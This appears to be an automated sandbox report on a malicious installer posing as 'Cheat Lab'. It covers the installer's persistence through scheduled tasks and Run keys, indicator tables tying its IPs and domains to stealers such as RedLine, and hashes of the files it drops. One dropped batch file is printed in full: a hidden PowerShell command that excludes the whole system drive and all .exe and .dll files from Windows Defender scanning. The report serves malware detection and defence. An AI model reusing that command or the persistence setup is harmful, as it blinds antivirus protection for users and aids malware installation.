                                                                                                                                      • Number of executed functions: 105
                                                                                                                                      • Number of non-executed functions: 207
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .msi

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.216.81.152
                                                                                                                                      • Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                      • Execution Graph export aborted for target LuaJIT.exe, PID 4128 because there are no executed function
                                                                                                                                      • Execution Graph export aborted for target LuaJIT.exe, PID 6136 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • VT rate limit hit for: Cheat.Lab.2.7.2.msi

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      15:35:03Task SchedulerRun new task: CheatLabUpdateTask path: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe s>"C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
                                                                                                                                      15:35:03API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                      15:35:11Task SchedulerRun new task: NotepadUpdateTask_NzEz path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
                                                                                                                                      15:35:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
                                                                                                                                      15:35:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
                                                                                                                                      15:36:09API Interceptor24x Sleep call for process: connect.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      208.95.112.1QvConnect32.EXE.exeGet hashmaliciousAgniane Stealer, zgRATBrowse
                                                                                                                                      • ip-api.com/json/?fields=11827
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                      HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • ip-api.com/json
                                                                                                                                      HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • ip-api.com/json/?fields=11827
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • ip-api.com/json/?fields=11827
                                                                                                                                      gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      RC7.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                      #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      Quotation.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                      • ip-api.com/json/

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      ip-api.comQvConnect32.EXE.exeGet hashmaliciousAgniane Stealer, zgRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      Product_lists_.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      cdn.discordapp.comchromebypass.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      VakifBankKrediKartiHesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      Porland_Sipari#U015f_Listesi_03.11.2023.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      REVISED_DOCUMENTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      HOSTGLOBALPLUS-ASRUfile.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.189
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.8
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.8
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.8
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.8
                                                                                                                                      dAe2EhvrR3.exeGet hashmaliciousDCRat, RedLine, zgRATBrowse
                                                                                                                                      • 91.103.252.23
                                                                                                                                      installer-unpumped.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.3
                                                                                                                                      MidnightInj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.3
                                                                                                                                      otMkkr8yba.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 91.103.252.23
                                                                                                                                      modest-menu.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.48
                                                                                                                                      setup.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.48
                                                                                                                                      file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.189
                                                                                                                                      UTkNFrq5ZG.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 91.103.252.215
                                                                                                                                      0A7906AC80F2E3DEC90365B47E62E57D77F4C389C55CE.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 91.103.252.23
                                                                                                                                      WXzp6KMJ7i.exeGet hashmaliciousDCRat, Raccoon Stealer v2, RedLineBrowse
                                                                                                                                      • 91.103.252.23
                                                                                                                                      BHIZs1pdBL.exeGet hashmaliciousAzorult, RHADAMANTHYS, Xmrig, zgRATBrowse
                                                                                                                                      • 91.103.252.25
                                                                                                                                      tc4Ftx0bPk.exeGet hashmaliciousMicroClip, Stealc, VidarBrowse
                                                                                                                                      • 91.103.252.74
                                                                                                                                      AFA69DD9872C7D923CC12358017DEED1E3B37F121884F.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                      • 91.103.252.65
                                                                                                                                      Documents informations.exeGet hashmaliciousVidarBrowse
                                                                                                                                      • 45.138.74.85
                                                                                                                                      rrQKgJDi4u.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 91.103.252.23
                                                                                                                                      TUT-ASUSQvConnect32.EXE.exeGet hashmaliciousAgniane Stealer, zgRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 208.95.112.2
                                                                                                                                      bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                      • 208.95.112.1
                                                                                                                                      gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                      • 208.95.112.1

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      37f463bf4616ecd445d4a1937da06e193Ggy2th52H.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      3Ggy2th52H.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      TT_copy_pdf.jsGet hashmaliciousFormBookBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      ins.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      SecuriteInfo.com.Trojan.NSIS.Guloader.22775.8808.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      RFQ-10004_PTT #U30d7#U30ed#U30b8#U30a7#U30af#U30c8#U00b7pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Aqua2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Aqua2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      SecuriteInfo.com.Trojan.NSIS.Guloader.26526.15163.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Attachment-3_RFQ10004#U00b7pdf.vbeGet hashmaliciousNanocore, GuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      CO.ADVERTENCIAM1.ja.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      yl620v88J8.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      yVvaKVQhUq.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      d83CR44HKh.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                      • 162.159.135.233

                                                                                                                                      Dropped Files

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAB91.tmpCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                        Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                          Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                            Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                Cheat.Lab.2.7.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    http://telegramos.org/downloadGet hashmaliciousUnknownBrowse
                                                                                                                                                      AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          winrar-611br.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                            Firefox-x64.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                              AnyDeskAPP.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                6p2LSuB1em.msiGet hashmaliciousEICARBrowse
                                                                                                                                                                  AnyDesk.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                    MERC_PG_MDLS.msiGet hashmaliciousUnknownBrowse

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Config.Msi\66bc0d.rbs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):193279
                                                                                                                                                                      Entropy (8bit):6.413806532969242
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:zM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiX:zBKwXYBWHRuEFW9RzLLhrUmdHDZ19MhC
                                                                                                                                                                      MD5:5351DE8A958D3FD5D70FAD2676621A63
                                                                                                                                                                      SHA1:1C6FCD99023E0BD95F22A5F789344AF67EE66AD8
                                                                                                                                                                      SHA-256:0982DDF4AE98754C69587A19FEB3E95453C62E6380BAB3B34533D4F47FA3A9F0
                                                                                                                                                                      SHA-512:021CEED612212F15773C10A7EF2AC7DB54463C3F8C6C3CBE89F2CD04A17013139874F337663EB6780B491AC03BC339C528A98AD9C397ECE4F6735B5308012D68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@b|fW.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@................

                                                                                                                                                                      C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1159168
                                                                                                                                                                      Entropy (8bit):6.056000673170944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                      MD5:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      SHA1:BEF96A36BA40446FBE5596D50BBC9E9ADC154D3B
                                                                                                                                                                      SHA-256:345911E89D241BC814827AEAB2F59004AF713BD088098634440EFF1B237DAF3D
                                                                                                                                                                      SHA-512:CD1EE8813C385213C1EDA31B8C460FF21ED25F228D39DA58A95B1A5CCD5E71E4B7964A2BCC22161730C92C68FBA3FE8EFF2418FEF50B8CEBBBA9CC5C303538C7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):128
                                                                                                                                                                      Entropy (8bit):4.7202350646624245
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:VSJJFIf9IMwEIF2VCceGAFddGeWLCX3AYGeWLERySn/n:s81xB1eGgdEY3AYGWRy0n
                                                                                                                                                                      MD5:89DB4CB88ED70579D72B500340691359
                                                                                                                                                                      SHA1:5A434F58080EEDFC78B0BA0A49710C6F3EFC5254
                                                                                                                                                                      SHA-256:72B2FAA3B9D4FB7CD3E007CF5DFB00D03893B26A6161D6ADE8D003F3D669C57E
                                                                                                                                                                      SHA-512:6E47F9F9DB0FCF42489567AD5DA1F1A031FC7423EE2DC79F94CDC3FF249FE18D1E8835D1A26655F4FE5BF58E8525EDBD227B12ED15EFFDDFF51642D57DB1E0BB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"

                                                                                                                                                                      C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129872
                                                                                                                                                                      Entropy (8bit):6.038065588362103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:2pA3JKOc1a+6lXmdTstTIezbdVR6KuyZze638dtoXKtmQkxE08yaU7L2SyCla:22bc5ApIsBVRVCtRkxE08yaC7yj
                                                                                                                                                                      MD5:5DE081465476323E3DCBE97602183C87
                                                                                                                                                                      SHA1:D3BD6A912A0FEF185ED8E02B9C411809B20EC7C0
                                                                                                                                                                      SHA-256:9C0ED1349DA4BA4449559FCEEBAC4556ADD7009684367151673A2F52200F3E84
                                                                                                                                                                      SHA-512:20CFB8DC88F81BE8356FB3EDA4AB74C0F137FBF4E3838FA545F47B941B1E10A344B8733F711C360964FC40F086EC986D689EB6EFDD5029D354D11F2BB004C4BD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.LJ..........-.......8...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........?.......-...-...4...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L.............R........,.F.....XGe.UGd.*G....G.XG.*G....G.XG..*G....G.XG.*G....G.XG.*G....G.XG..*G....G.XG.*G....G.XG..*G....G.XG..*G....G.XG..)(...&(.XG..+...XG..+....3......XG..*...XG..*...XG..::..'&..* ..-G..:H..8*HG'3..-G..:H..8.HG.G...I&..J .BG....G.-G..BG....G.8..*-G..<..G-G..:H..8 HG-G..:H..8/HG*....G/..I3..J..BG...)G.-G..)I.BG....G.8..:8&) -G..*I..4J..:K..>K.J:K..>K.JBG... G.*...'3...G...I:..J&..K .BG....G.-G..:H..8 HG-G..:H..8/HG.G/..I3..J..BG...)G.8&) .G...H&.&*HG-G..:H..8 HG'3..*...*(..-G..:H..8/HG.G/..I3..J..BG...)G.*=..8&) '...8..*'...-G..*I..4J..:K..>K.J:K..>K.J>..JBG... G..G...I*..J&..K .BG....G.-G..:H..8/HG-G..:H..8)HG.G)..I...J(.BG...3G.'(..*...8 3/-G..:H..8)HG-G..:H..83HG.G3..I(..J=.BG....G.8/.)'=..-G..:H..83HG-G..:H..8.HG.G...I

                                                                                                                                                                      C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1159168
                                                                                                                                                                      Entropy (8bit):6.056000673170944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                      MD5:9CB9E0D0975E51A90BDED2B3BE8FACA9
